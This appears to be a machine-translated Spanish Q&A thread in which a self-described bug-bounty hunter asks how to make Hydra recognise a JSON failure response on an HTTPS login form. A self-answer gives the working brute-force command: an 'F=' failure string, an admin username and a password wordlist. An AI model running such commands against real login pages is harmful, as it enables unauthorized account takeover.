¿Cómo ejecutar Hydra con respuesta json?

Question

¿Cómo ejecutar Hydra con respuesta json?

#1 de Daniel Max (2 votos)

3

He estado haciendo algunas caza de recompensas de errores y he tenido problemas con la hidra. Así que hay un formulario de inicio de sesión https, la solicitud es:

https://bbsite/crp/login?password=pass&username=admin

El problema es que la respuesta está en json. Así que para un mal inicio de sesión es:

{"success":false,"greska":"Pogre\u0161no."}

Así que mi solución fue:

hydra  bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:{\"success\"\:false,\"greska\"\:\"Pogre\u0161no\"}" -l admin -P /root/Downloads/pass.txt

Pero esto no está funcionando, y no tengo idea de por qué. ¿Alguien puede sugerir una solución?

hydra

pregunta Daniel Max 22.03.2016 - 17:01

fuente

1 respuesta

Lea otras preguntas en las etiquetas hydra

Aireplay-ng no funciona correctamente en Ubuntu ¿Cómo acelerar el apretón de manos TLS lento en ESP8266 ejecutando mbed TLS?

score 2 · Answer 1

2

Solución encontrada:

hydra  bbsite https-get-form "/crp/login:username=^USER^&password=^PASS^:F={\"success\"\:false,\"greska\"\:\"Pogre\\u0161no\"}" -l admin -P /root/Downloads/pass.txt

Se necesita agregar F = para el inicio de sesión fallido. Necesario para escapar \ con \.

respondido por el Daniel Max 22.03.2016 - 17:09

fuente